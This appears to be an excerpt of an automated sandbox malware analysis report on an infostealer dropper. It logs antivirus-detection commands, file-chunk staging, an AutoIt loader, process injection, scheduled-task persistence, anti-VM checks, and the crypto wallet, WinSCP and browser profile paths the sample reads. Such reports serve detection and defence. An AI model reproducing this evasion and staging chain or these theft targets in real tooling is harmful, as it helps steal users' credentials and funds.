Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CFF426 push ecx; ret 22_2_00CFF439
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A6ED7C push ecx; ret 23_2_00A6ED8F
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A8F2BB push ss; iretd 23_2_00A8F2BC
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A6F426 push ecx; ret 23_2_00A6F439
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A6F426 push ecx; ret 24_2_00A6F439
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A6ED7C push ecx; ret 24_2_00A6ED8F

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe File created: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe
Source: C:\Windows\System32\OpenWith.exe File created: C:\Users\user\AppData\Local\Microsoft\Yuem.exe
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe File created: C:\Windows\Tasks\Dctooux.job
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CFDBB8 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 22_2_00CFDBB8
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: dialer.exe, 00000010.00000002.2280612500.0000000002F70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MP.EXEX64DBG.EXEX32DBG.E
Source: dialer.exe, 00000010.00000002.2280612500.0000000002F70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: dialer.exe, 00000010.00000002.2280612500.0000000002F70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE
Source: dialer.exe, 00000010.00000002.2280612500.0000000002F70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMU""X
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B636ABBE str word ptr [ebp+ecx*4+05h] 20_3_00007DF4B636ABBE
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe API coverage: 4.3 %
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe API coverage: 1.3 %
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe TID: 5888 Thread sleep time: -3000000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe TID: 2792 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe TID: 2140 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe TID: 5888 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_00406873 FindFirstFileW,FindClose, 0_2_00406873
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C49
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6388E20 GetLogicalDriveStringsW, 20_3_00007DF4B6388E20
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63E7344 GetSystemInfo, 20_3_00007DF4B63E7344
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: dialer.exe, 00000010.00000002.2280661154.0000000004720000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: HGfS09
Source: J2NWKU2oJi.exe, 00000000.00000002.1772749377.00000000007D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: od_VMware_SATA_CD00#4&224f42ef&0&000
Source: dialer.exe, 00000010.00000002.2280361925.0000000002D28000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: OpenWith.exe, 00000014.00000003.2378242743.000001BD776C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkmbolicLinkSymbolicLink
Source: OpenWith.exe, 00000014.00000002.2583923900.000001BD776AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SyT
Source: Yuem.exe, 00000016.00000003.2535201056.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: OpenWith.exe, 00000014.00000003.2378242743.000001BD776C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkLinkcLinkSymbolicLink
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: OpenWith.exe, 00000014.00000003.2377146496.000001BD776A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkcLinkSymbolicLink`
Source: dialer.exe, 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DisableGuestVmNetworkConnectivity
Source: OpenWith.exe, 00000014.00000003.2330137003.000001BD7776A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMCIDevSymbol
Source: dialer.exe, 00000010.00000002.2280361925.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: dialer.exe, 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: EnableGuestVmNetworkConnectivity
Source: dialer.exe, 00000010.00000002.2280361925.0000000002D28000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWMaxClockSpeed
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CFF00A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_00CFF00A
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D0D3E9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 22_2_00D0D3E9
Source: C:\Windows\SysWOW64\dialer.exe Code function: 16_3_027E027F mov eax, dword ptr fs:[00000030h] 16_3_027E027F
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D1B6E2 mov eax, dword ptr fs:[00000030h] 22_2_00D1B6E2
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D1797B mov eax, dword ptr fs:[00000030h] 22_2_00D1797B
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A8B6E2 mov eax, dword ptr fs:[00000030h] 23_2_00A8B6E2
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A8797B mov eax, dword ptr fs:[00000030h] 23_2_00A8797B
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A8B6E2 mov eax, dword ptr fs:[00000030h] 24_2_00A8B6E2
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A8797B mov eax, dword ptr fs:[00000030h] 24_2_00A8797B
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D20243 GetProcessHeap, 22_2_00D20243
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\OpenWith.exe Code function: 20_2_000001BD75701A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler, 20_2_000001BD75701A90
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CFE63C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 22_2_00CFE63C
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CFF00A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_00CFF00A
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CFF16F SetUnhandledExceptionFilter, 22_2_00CFF16F
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D17EFE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_00D17EFE
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A6E63C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 23_2_00A6E63C
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A6F00A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_00A6F00A
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A6F16F SetUnhandledExceptionFilter, 23_2_00A6F16F
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A87EFE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_00A87EFE
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A6F00A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_00A6F00A
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A6F16F SetUnhandledExceptionFilter, 24_2_00A6F16F
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A6E63C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 24_2_00A6E63C
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A87EFE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_00A87EFE

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CE74F0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree, 22_2_00CE74F0
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c move Scenes Scenes.bat && Scenes.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 331463
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "AdditionUnitKoreanLn" Remembered
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Pitch + Twelve + Conditions + Venture + Pushing 331463\Q
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif 331463\Pleasure.pif 331463\Q
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Process created: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe "C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe"
Source: Pleasure.pif, 0000000A.00000000.1724748135.0000000000206000.00000002.00000001.01000000.00000006.sdmp, Cocks.0.dr, Pleasure.pif.1.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CFF1F6 cpuid 22_2_00CFF1F6
Source: C:\Windows\System32\OpenWith.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B637F83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 20_3_00007DF4B637F83C
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CEB385 CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize, 22_2_00CEB385
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CEB2B0 GetUserNameA, 22_2_00CEB2B0
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D23B1A _free,GetTimeZoneInformation, 22_2_00D23B1A
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040352D
Source: C:\Windows\System32\OpenWith.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 20.3.OpenWith.exe.1bd77981c18.19.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.Yuem.exe.ce0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.Yuem.exe.ce0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Dctooux.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.OpenWith.exe.1bd779c0438.24.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.Dctooux.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.Dctooux.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.Dctooux.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.OpenWith.exe.1bd779c0438.21.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.Dctooux.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.Dctooux.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.OpenWith.exe.1bd779627f8.20.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.2745389510.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2520663901.000001BD779C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2518352508.000001BD77953000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.2522186450.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2755905464.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2518526497.000001BD7793B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2522953680.000001BD77953000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.2552580820.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.2538475835.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe, type: DROPPED
Source: Yara match File source: 00000010.00000003.2230681896.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2280661154.0000000004720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2201808869.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: OpenWith.exe, 00000014.00000003.2380401073.000001BD77781000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: !CP:Defichain-Electrum
Source: OpenWith.exe, 00000014.00000003.2380401073.000001BD77781000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\ElectronCash\config
Source: OpenWith.exe, 00000014.00000003.2385145930.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\com.liberty.jaxx
Source: OpenWith.exe, 00000014.00000003.2387896301.000001BD776A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Exodus\exodus.wallet
Source: OpenWith.exe, 00000014.00000003.2387896301.000001BD776A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: OpenWith.exe, 00000014.00000003.2387934347.000001BD7776B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Coinomi\Coinomi\wallets
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser\newtab
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.default
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
